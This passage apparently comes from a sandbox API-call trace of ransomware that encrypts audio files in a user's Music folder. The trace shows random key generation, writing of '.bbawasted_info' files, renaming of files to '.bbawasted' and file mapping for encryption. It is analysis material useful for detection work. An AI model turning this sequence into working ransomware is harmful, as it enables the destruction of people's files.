phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.870] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.870] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.878] SetEndOfFile (hFile=0x120) returned 1 [0073.881] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.881] CloseHandle (hObject=0x120) returned 1 [0073.883] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.883] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cba78 | out: hHeap=0x580000) returned 1 [0073.883] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.884] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.884] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.884] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\BITbZv7euBqSgvfz.wav") returned 80 [0073.884] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5bf070 [0073.884] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.884] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.884] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.885] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.885] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\BITbZv7euBqSgvfz.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\bitbzv7eubqsgvfz.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.885] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.886] SetEndOfFile (hFile=0x120) returned 1 [0073.886] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.886] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.886] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\BITbZv7euBqSgvfz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\bitbzv7eubqsgvfz.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\BITbZv7euBqSgvfz.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\bitbzv7eubqsgvfz.wav.bbawasted")) returned 1 [0073.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\BITbZv7euBqSgvfz.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\bitbzv7eubqsgvfz.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.887] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.888] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.889] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.889] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.889] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.890] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.890] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.898] SetEndOfFile (hFile=0x120) returned 1 [0073.901] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.901] CloseHandle (hObject=0x120) returned 1 [0073.906] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.906] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.907] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.907] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.907] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\gsdOz1hClKjGI0Cr i.mp3") returned 82 [0073.907] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ae) returned 0x5bf070 [0073.907] lstrcpyW (in: lpString1=0x5bf114, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.908] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.908] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.909] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.909] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\gsdOz1hClKjGI0Cr i.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\gsdoz1hclkjgi0cr i.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.909] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.910] SetEndOfFile (hFile=0x120) returned 1 [0073.911] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.911] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.911] lstrcpyW (in: lpString1=0x5bf114, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\gsdOz1hClKjGI0Cr i.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\gsdoz1hclkjgi0cr i.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\gsdOz1hClKjGI0Cr i.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\gsdoz1hclkjgi0cr i.mp3.bbawasted")) returned 1 [0073.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\gsdOz1hClKjGI0Cr i.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\gsdoz1hclkjgi0cr i.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.912] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.913] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.914] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.914] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.915] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.916] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.916] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.927] SetEndOfFile (hFile=0x120) returned 1 [0073.930] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.930] CloseHandle (hObject=0x120) returned 1 [0073.940] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.940] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.941] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.941] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\h40hJxgdjkjJx.m4a") returned 77 [0073.941] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0073.941] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.942] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.942] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.942] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.942] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\h40hJxgdjkjJx.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\h40hjxgdjkjjx.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.943] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.944] SetEndOfFile (hFile=0x120) returned 1 [0073.944] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.944] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.945] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\h40hJxgdjkjJx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\h40hjxgdjkjjx.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\h40hJxgdjkjJx.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\h40hjxgdjkjjx.m4a.bbawasted")) returned 1 [0073.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\h40hJxgdjkjJx.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\h40hjxgdjkjjx.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.946] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.062] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.063] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.063] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.063] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.064] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.064] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.072] SetEndOfFile (hFile=0x120) returned 1 [0074.074] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.074] CloseHandle (hObject=0x120) returned 1 [0074.075] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.075] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.076] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.076] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.076] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\oHsg.wav") returned 68 [0074.076] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5bf070 [0074.076] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.076] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.076] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.077] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.077] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\oHsg.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ohsg.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.078] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.079] SetEndOfFile (hFile=0x120) returned 1 [0074.079] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.079] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.079] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\oHsg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ohsg.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\oHsg.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ohsg.wav.bbawasted")) returned 1 [0074.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\oHsg.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\ohsg.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.081] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.084] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.084] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.084] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.084] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.085] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.085] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.093] SetEndOfFile (hFile=0x120) returned 1 [0074.096] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.096] CloseHandle (hObject=0x120) returned 1 [0074.097] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.097] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.098] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.098] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.098] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Q3TY1.wav") returned 69 [0074.098] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x294) returned 0x5bf070 [0074.098] lstrcpyW (in: lpString1=0x5bf0fa, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.098] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.098] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.099] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.099] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Q3TY1.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\q3ty1.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.100] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.100] SetEndOfFile (hFile=0x120) returned 1 [0074.101] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.101] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.101] lstrcpyW (in: lpString1=0x5bf0fa, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Q3TY1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\q3ty1.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Q3TY1.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\q3ty1.wav.bbawasted")) returned 1 [0074.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\Q3TY1.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\q3ty1.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.101] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.104] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.105] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.105] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.105] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.106] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.106] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.114] SetEndOfFile (hFile=0x120) returned 1 [0074.116] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.116] CloseHandle (hObject=0x120) returned 1 [0074.117] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.118] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.135] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.135] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.135] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\qkedT2UwUZgjryuRX.wav") returned 81 [0074.135] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5bf070 [0074.135] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.135] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.135] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.136] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.136] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\qkedT2UwUZgjryuRX.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js 